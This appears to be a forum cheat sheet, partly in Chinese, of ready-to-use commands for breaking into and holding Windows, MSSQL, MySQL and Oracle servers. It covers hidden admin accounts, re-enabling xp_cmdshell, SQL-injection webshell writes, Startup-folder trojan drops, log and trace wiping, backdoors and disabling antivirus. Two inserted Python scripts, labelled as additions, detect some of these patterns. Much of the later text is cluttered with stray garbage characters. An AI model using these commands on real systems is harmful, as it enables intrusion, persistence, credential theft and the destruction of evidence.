1. net user administrator /passwordreq:no
This line means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you log straight in; once inside, run net user administrator /passwordreq:yes to restore it.
2. A fairly neat way to build a clone account
First create an ordinary user account,
then export its registry entry, then delete the account in Computer Management,
then re-import the entry and add the account to the Administrators group.
3. Reading the Radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a key named "services.exe",
then under it create a string value
whose data is the full path of the trojan.
5. runas /user:guest cmd
Tests user permissions!
6. tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'-- This actually relies on the tlntadmn command. If you want the details, type /? and take a look. (This needs administrator privileges.) Creating an identical user and getting through NTLM authentication needs no explanation from me, right?
7. Post-intrusion patching, trace cleanup and backdoor placement:
Basic holes must be patched, e.g. SU privilege escalation and SA injection. For DBO injection consider killing xp_treelist and xp_regread, and make a note of the web directory yourself; you absolutely must clean up your traces. For SQL Server connections it is better to use Enterprise Manager; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete them. When clearing IIS logs, do not use AIO-type tools that wipe the logs completely; choose a logcleaner-type tool that only deletes the access records for a given IP. If you can get the administrator password via GINA, log in as him to clean the logs and do the final trace cleanup with WYWZ. That said, manual cleanup is safer. Finally, leave a backdoor that keeps no logs. A few one-liner backdoors, a standard backdoor and a cfm backdoor: I normally never skip any of these. Remember to change the timestamps. There is also a rather ruthless trick: if the machine is just an ordinary zombie, drop a TXT on the administrator's desktop telling him you broke in, planted a certain backdoor and added a certain user (not your real important backdoor, of course) and ask him to clean it up. That way there is a good chance your real backdoor gets to stay.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'

9. MSSQL Server 2005 has xp_cmdshell switched off by default.
If you want to enable it, you have to turn it on through the advanced options.
It can be injected directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
After the extended stored procedure has been deleted there is a very simple way to restore it:
Delete:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
This restores it directly, regardless of whether sp_addextendedproc still exists.

-----------------------------

Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is there.

Restore xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked.

Otherwise upload xplog70.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL statement to block cmdshell
sp_dropextendedproc "xp_cmdshel
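For the other side of items 8 to 10, here is an added detection example (not from the original post) that runs over constructed SQL Server statement text of the kind an audit or trace would record and flags the sp_configure enable, addextendedproc re-register, sp_oacreate and xp_cmdshell execution shapes shown above. It also handles the split-string form EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ...') that appears further down the page by joining the literals before matching; the sample statements and finding labels are constructed for the example.

```python
import re

# Constructed sample statements, one per line, of the kind a SQL Server
# audit or trace would record (not a real capture).
SAMPLE_STATEMENTS = [
    "SELECT TOP 10 name FROM sysobjects WHERE xtype='U'",
    "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;"
    "EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;",
    'dbcc addextendedproc("xp_cmdshell","xplog70.dll")',
    "declare @shell int exec sp_oacreate 'wscript.shell',@shell output "
    "exec sp_oamethod @shell,'run',null,'cmd.exe /c whoami'",
    "EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')",
    "EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;",
]

# Each label names the statement shape from the post that it detects.
PATTERNS = {
    "xp_cmdshell enabled via sp_configure":
        re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1\b", re.I),
    "extended procedure re-registered (addextendedproc)":
        re.compile(r"addextendedproc\b.*?\b(xp_cmdshell|sp_oacreate)\b", re.I),
    "OLE automation used to run a program (sp_oacreate wscript.shell)":
        re.compile(r"sp_oacreate\b.*?wscript\.shell", re.I),
    "xp_cmdshell executed":
        re.compile(r"\bxp_cmdshell\s+'", re.I),
}


def normalize(stmt):
    """Join adjacent string literals ('ma'+'ster' -> 'master') and collapse
    whitespace, so a command assembled from fragments inside EXEC() is
    matched against the text it really builds rather than the fragments."""
    joined = re.sub(r"'\s*\+\s*'", "", stmt)
    return re.sub(r"\s+", " ", joined).strip()


def classify(stmt):
    """Return the labels (in PATTERNS order) that match one statement."""
    text = normalize(stmt)
    return [label for label, pattern in PATTERNS.items() if pattern.search(text)]


def scan(statements):
    """Return (1-based index, statement, labels) for each matching statement."""
    hits = []
    for index, stmt in enumerate(statements, 1):
        labels = classify(stmt)
        if labels:
            hits.append((index, stmt, labels))
    return hits


if __name__ == "__main__":
    for index, stmt, labels in scan(SAMPLE_STATEMENTS):
        print(f"#{index}: {', '.join(labels)}")
        print(f"    {stmt}")
```

Note that the statement that sets xp_cmdshell back to 0 is left alone, and the split-string EXEC is only caught after normalize() has joined its fragments.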
-------------------------
Clear the 3389 login records with a single built-in system command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
View the current user's privileges in MySQL
show grants for

The following statements give a user the same privileges as root. You will have run into this when taking a site: MySQL's root user can only connect locally and refuses outside connections. The method below solves that. The statements create a user itpro with password 123 and the same privileges as root, allowed to connect from any host, so you can conveniently work on the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
When you are done, remember to remove your footprints.
Drop USER 'itpro'@'%';
Drop DATABASE IF EXISTS `itpro` ;

Getting SYSTEM privileges as the current user
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec",user)
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>

Bypassing the CAPTCHA limit to get into the backend and take a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000
Save as code.reg, import it into the registry and restart IE;
that is all it takes.
Writing a shell via UNION
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
Used against the dedecms injection vulnerability; writes a shell without the backend.
In the dedecms backend, when there is no file manager and no outfile privilege,
go to Plugin Management - Virus Scan
and write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format above.

In Oracle, after logging in as a low-privileged user, run the following statement to query the password hashes of sys and the other users, then crack them with Cain
Code:
select username,password from dba_users;

MySQL remote connection user
Code:
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
1. Query the terminal port

XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enable terminal services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3. Change the terminal port to 20008 (0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4. Remove the XP & 2003 firewall restrictions on terminal services port 3389 and on connecting IPs
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f

5. Enable the terminal on Win2000, port 3389 (reboot required)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
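A defender-side counterpart, added here and not part of the original post: a parser for the .reg export format that the echo script above writes (and that regedit /e produces), followed by an audit of the settings this page keeps returning to, namely fDenyTSConnections, the two RDP PortNumber values, the Winlogon GinaDLL value, NoLMHash and Image File Execution Options debugger entries. The sample export and the finding texts are constructed for the example.

```python
import re

# Constructed sample export in the "Windows Registry Editor Version 5.00"
# format (values chosen to trigger every check; not taken from a real host).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL"="awgina.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe]
"Debugger"="c:\\temp\\x.exe"
"""

VALUE_LINE = re.compile(r'^"(?P<name>[^"]+)"=(?P<value>.+)$')

# Key paths are compared lower-cased because the registry is case-insensitive.
TS = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
WINLOGON = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon"
LSA = r"hkey_local_machine\system\currentcontrolset\control\lsa"
IFEO = r"hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options"
RDP_PORT_KEYS = {
    "RDP-Tcp": TS + r"\winstations\rdp-tcp",
    "Tds\\tcp": TS + r"\wds\rdpwd\tds\tcp",
}


def parse_reg(text):
    """Parse a REGEDIT4 / 'Windows Registry Editor Version 5.00' export into
    {key path (lower-cased): {value name (lower-cased): value}}.
    dword values become ints; quoted strings are unescaped; any other value
    type (hex:, hex(2): ...) is kept as its raw text."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", "REGEDIT4", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m is None or current is None:
            continue
        name, value = m.group("name").lower(), m.group("value")
        if value.startswith("dword:"):
            keys[current][name] = int(value[len("dword:"):], 16)
        elif len(value) >= 2 and value.startswith('"') and value.endswith('"'):
            keys[current][name] = value[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        else:
            keys[current][name] = value
    return keys


def audit(keys):
    """Return human-readable findings for the settings this page touches."""
    findings = []
    if keys.get(TS, {}).get("fdenytsconnections") == 0:
        findings.append("Remote Desktop enabled: fDenyTSConnections=0")
    for label, path in RDP_PORT_KEYS.items():
        port = keys.get(path, {}).get("portnumber")
        if port is not None and port != 3389:
            findings.append(f"non-default RDP port {port} under {label}")
    gina = keys.get(WINLOGON, {}).get("ginadll")
    if gina:
        findings.append(f"custom GINA DLL registered: {gina}")
    if keys.get(LSA, {}).get("nolmhash") == 0:
        findings.append("NoLMHash=0: LM hashes of passwords will be stored")
    for path, values in keys.items():
        if path.startswith(IFEO + "\\") and "debugger" in values:
            exe = path.rsplit("\\", 1)[-1]
            findings.append(f"IFEO Debugger set for {exe}: {values['debugger']}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_REG)):
        print(finding)
```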
4 A( l v* A9 r4 k6 e
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)+ Z- a- D" @; c$ U+ X2 X' p5 w
4 q3 D; `. b, ?1 z7 d6 |& P& c@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
: b' V# i. f- t+ h(set inf=InstallHinfSection DefaultInstall)
1 ]& j4 h: @. c/ f/ W+ N4 h, }echo signature=$chicago$ >> restart.inf
! P `% G6 n8 A: z" R$ Zecho [defaultinstall] >> restart.inf0 w7 s% S7 }& U! p
rundll32 setupapi,%inf% 1 %temp%\restart.inf
) {5 c' g- N) [+ u
$ I" d0 ^" R+ j; h# n& K) m# i, a' A0 s
7.禁用TCP/IP端口筛选 (需重启)8 O; T1 l' l3 h' V9 u& S7 W8 O1 q
k* {; `, l# b3 A% \" y8 z2 Z* U# k% M
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f7 i* n; v2 S" z, z5 i8 a% N
7 }' G/ N6 E `) S8.终端超出最大连接数时可用下面的命令来连接
; a: ~+ G' l6 z. b
; F& L* R0 s9 u5 U7 Pmstsc /v:ip:3389 /console- z8 G! e* _. M4 B
" ]% e: p/ e, g: y6 W/ Z m1 r# o2 p
9.调整NTFS分区权限% `8 d$ |* [" ^& d
. Z f/ R' z" U! t
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)5 ^0 ^7 v. b' i: B$ F
# g. ^0 d6 V6 u- _8 M
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)4 @# T9 ]6 s9 z
! ~$ `% A/ w: v
------------------------------------------------------
9 V% N' D K# ]9 R: O3389.vbs ) t l1 w) F( K' ]* a8 h J5 E
On Error Resume Next. e5 M+ }) w* c4 r; F
const HKEY_LOCAL_MACHINE = &H80000002: s$ W* S0 C" M) _ j y' }+ D
strComputer = "."
- c. f: Z m. z4 z5 ^7 X x3 qSet StdOut = WScript.StdOut6 |" Y+ f U: r" ^: e
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
4 q( M- S' |- f; I# h) bstrComputer & "\root\default:StdRegProv")
( n! @9 ~+ w$ `5 r5 |3 ]( NstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
) F: k" o7 N: b' Zoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath' E% P, i) Q# [/ O$ F+ a0 B+ X3 w
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"$ W+ N: L/ x: _; R6 U* t: W
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
( s% J6 I: [+ i$ fstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp") W2 A- c; x' u3 f$ M
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server", v3 |8 B! G/ p
strValueName = "fDenyTSConnections"( E. k# c* M' ?' K) X6 O
dwValue = 0
& a" O6 C2 l- _& H. _$ \7 k# Zoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# p) X# \7 y. z( YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
9 E" u* |, {6 ?. |4 t2 tstrValueName = "ortNumber"
3 N6 W$ W% p( C& B7 P, n" OdwValue = 3389
, T8 M1 q$ j9 j4 K- H: ooreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue, N% o& B# s. f! H
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
! _2 d* w5 G4 q I4 u# _strValueName = "ortNumber"
$ M/ F/ d6 O7 T* s) odwValue = 33891 V% u# E8 H5 a$ w* Y4 p
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 U1 D8 J# C2 _) c' QSet R = CreateObject("WScript.Shell")
$ @/ L* @0 T d3 Q* mR.run("Shutdown.exe -f -r -t 0")
. ^1 z( j- H' I( t0 v; j, H
6 a9 _% O+ [" I3 x! o( ~; G! C+ Q" [删除awgina.dll的注册表键值$ q0 U1 O& @& H' [ D
程序代码 ~' Z4 u" R4 h& L: e8 ` M4 I
& p) U- N# c6 c" [2 [, ]
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
8 w( b! t9 ^+ E1 W8 n
% y" w* ?5 W+ ?6 r' Z& L- N: d) |7 a; a% D- g
" J1 u* G% j( I! A/ k6 U& K v" g
* w7 R! W- [" z& [- Q! K程序代码
6 K6 z! y2 K6 P2 C' r) VHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash$ b9 d$ G$ Q& ~6 F8 ^0 Z# E0 f
- F) Y4 T7 x. w# B9 v. D$ R
设置为1,关闭LM Hash# t$ ~! Q$ G0 B1 e2 c: Y
8 d( l1 @2 X: J& z& X7 R3 b
数据库安全:入侵Oracle数据库常用操作命令. r$ f4 f- b; x: Z1 T) y
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
% H6 J; H! K7 o7 K1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
: }' _+ O! _8 A$ M, P2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
. G/ Q. c+ h+ t: K Y4 i3、SQL>connect / as sysdba ;(as sysoper)或
. [% l! C, I" ]; |5 Uconnect internal/oracle AS SYSDBA ;(scott/tiger)9 E* t) {' I9 P5 C/ b4 j/ a: W
conn sys/change_on_install as sysdba;' p2 {! C" Y) F- n' O* M, C" \
4、SQL>startup; 启动数据库实例
$ b% c" o# n- F$ z" F, M# `" p! a5、查看当前的所有数据库: select * from v$database;
$ j `6 F7 [6 ?select name from v$database;
* x% \* b G1 Z6、desc v$databases; 查看数据库结构字段
" M2 m" K" v7 R" U3 Z4 t7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
: ]& S& {/ \: p+ w( U$ u- qSQL>select * from V_$PWFILE_USERS;
6 M5 |$ P9 l2 M8 qShow user;查看当前数据库连接用户( L! X$ ?* ?/ ]' ^6 o" `
8、进入test数据库:database test;' W% V) ~ W8 V6 y
9、查看所有的数据库实例:select * from v$instance;
/ L8 G- b/ N# W# v1 T如:ora9i. g: z' L5 A7 z6 o/ u
10、查看当前库的所有数据表:5 l( l; x N6 V# Y: Z* t4 Y) r
SQL> select TABLE_NAME from all_tables;
+ k Q3 O$ }7 x1 I+ ?0 U* wselect * from all_tables;
+ K3 J& n8 n* B$ N. b+ h" p9 gSQL> select table_name from all_tables where table_name like '%u%';7 C7 V0 V9 G# |) }' v. B# c
TABLE_NAME. V$ J: e" d Z
------------------------------) d& a1 v0 s; i1 O3 A7 W
_default_auditing_options_
- E) j+ u+ C1 [4 e9 V$ T2 {% W11、查看表结构:desc all_tables;
0 a: N/ t. [) v* y& p K12、显示CQI.T_BBS_XUSER的所有字段结构:
7 g( F I) j3 V( v6 w" ]7 m# [desc CQI.T_BBS_XUSER;) x, C& U7 v) _. x% O8 D
13、获得CQI.T_BBS_XUSER表中的记录:
) ^; l U# J Rselect * from CQI.T_BBS_XUSER;
' ^& _! r0 ^8 \" B1 K# F14、增加数据库用户:(test11/test)+ U8 c& }( z3 d
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
. i5 C5 Q3 s+ O) l9 i" y15、用户授权:4 D. Q X5 l* P+ ^1 L, V
grant connect,resource,dba to test11;' W4 d2 x; N; e' i( U
grant sysdba to test11;
# Q: i' j' p; F( `. |8 hcommit;5 s/ d' G, }# U' L
16、更改数据库用户的密码:(将sys与system的密码改为test.)' T5 ?7 V: L7 e
alter user sys indentified by test;
+ j4 x3 h8 x; E+ c, Calter user system indentified by test;
+ Z1 W6 J" S( C0 i" _+ ?) e6 i7 \, a5 g9 X9 X# L: E
applicationContext-util.xml
. C) W e! s' P1 A8 {applicationContext.xml
/ W5 M( z+ V B0 x* L7 nstruts-config.xml- A3 c) K& w1 w5 R2 X% V# F, L
web.xml
I5 j) s: m7 }% T9 X7 mserver.xml, a& a+ b* y# u4 E
tomcat-users.xml" l6 E' p, j; `5 P& c/ M- v5 m
hibernate.cfg.xml/ b+ G6 q+ o* o+ h
database_pool_config.xml8 w3 c3 {% Z7 ~- p1 B1 |3 C+ \
* ?! V# g$ Y: G6 d
, {: J, W" U/ X; O5 h8 w\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置, n4 v1 Z8 e3 p! Z
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
! v: S O) p5 t' K\WEB-INF\struts-config.xml 文件目录结构; Y3 ]" z, _+ d9 ^. @: e& \7 |
, s( w% N7 \3 S L; n3 ~( {* x
spring.properties 里边包含hibernate.cfg.xml的名称
' ~6 V: i* ?* E4 v+ a% z( G5 H' |6 \+ Q/ {; H, P
y. W% B3 n' V7 F0 \
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml7 f( y5 u: J, {5 {" L# k
$ [2 J4 s! ^' d) L% r) V
如果都找不到 那就看看class文件吧。。
7 I& c: G# Z6 r! i' ~7 e9 P, W: r3 a$ K% O5 U/ Q& X7 @
测试1:/ p. V# M- |- }4 p7 l$ B0 u
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
- C3 t5 i8 M* R1 N- S6 q6 E# Y1 h. I: \* E* N
测试2:" S! T: D" s% V
* o- \* j" E* O% x1 b% B0 H6 w! h7 icreate table dirs(paths varchar(100),paths1 varchar(100), id int)6 W& W% V" ?3 z
* a, ]9 }3 p5 O8 U) q$ w1 ]7 ]* l$ X
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
& z- D- z* y$ ^9 `% P2 N* U; T7 T
. ?1 _- q M6 |0 y u% D) i& J7 rSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1; x# _7 R) V( g% A( S( m3 [8 h- t9 i- Y
[- ]* Z. L6 B1 @( i0 H0 |1 P# T4 z查看虚拟机中的共享文件:2 ?# N( M% ?1 _3 O( P% t$ v0 W/ r. g
在虚拟机中的cmd中执行' s3 M2 w5 M: ~! |
\\.host\Shared Folders
; ^2 n1 s% a1 P; h. r6 D; C- L3 E7 @, C5 s
cmdshell下找终端的技巧3 f# s+ V: c' h
找终端:
" u! N; t, X, ?% i# U' g: z7 {/ T [第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
2 s; o. a6 J# R/ L/ y 而终端所对应的服务名为:TermService
/ c5 F2 f, M+ i* \5 f2 o; v! D# s第二步:用netstat -ano命令,列出所有端口对应的PID值! : @' R# l# Z" p# m9 Q
找到PID值所对应的端口+ D% A: ^+ z' ~- V: \0 d0 e
8 f- W1 O, y" K' S查询sql server 2005中的密码hash# q$ K H' y9 e6 C
SELECT password_hash FROM sys.sql_logins where name='sa'* e1 H8 V, K4 `( l
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a6 _9 v* V8 F. m7 E' A/ m: u0 d0 i
access中导出shell4 @; I0 K/ ]) l
/ h r' N7 \0 {3 t
中文版本操作系统中针对mysql添加用户完整代码:" e c! ` @/ X
& t8 k. Z4 O% S0 y7 v3 g
use test;
+ A7 Y" c2 v% O" r$ u/ K$ a! Jcreate table a (cmd text);
{6 D; k9 E9 tinsert into a values ("set wshshell=createobject (""wscript.shell"") " );& ]7 h9 @, x( e% U4 x
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
/ b7 l$ Q/ ]$ f8 s& O! d! m6 pinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
) j1 k- ~: c. o4 S k& }( Jselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";9 H3 I, r+ d$ i. b
drop table a;
6 t% {6 `7 }. ]$ r: Z+ J
5 k- ]+ F* c. w( o) V. y英文版本:! E+ [7 f% Q. Z7 g
7 ` n& O4 ]/ g+ D; v6 p4 h( M" wuse test;
$ @+ B7 V+ k- `3 q. gcreate table a (cmd text);
: `1 X) K/ H5 Einsert into a values ("set wshshell=createobject (""wscript.shell"") " );
, y! W: h* N2 x; N( U; xinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
2 y. }6 J" f+ y1 W) I) r9 |insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );. Q) a7 a- k' l) k
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
' M7 B5 Q% ~" Bdrop table a;
5 ~: H) D {* ?( Y) S, y( U( g; \ V" h# j" z, @& B5 o. E- X
create table a (cmd BLOB);
6 D' S7 r& P5 m- Y; Cinsert into a values (CONVERT(木马的16进制代码,CHAR));; F' O5 ?) n8 L' M6 ?" r) u- r
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
) ]# ~7 D1 d9 `$ b! B4 A/ @drop table a;& [* W6 v: R7 z0 H) e9 j- _7 t6 t
( S, m( e: g4 R+ Q" f7 t记录一下怎么处理变态诺顿
# Y2 F7 o, n/ C# I( W: `0 Z查看诺顿服务的路径8 P& R7 Q8 c5 b0 I( K, s5 n$ v
sc qc ccSetMgr! c4 C* p4 j w. S% p3 i& w
然后设置权限拒绝访问。做绝一点。。& o) \4 q3 ~ x) l/ u5 E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
s- \ r- C9 I# f* rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER" i; R' Y/ }/ i
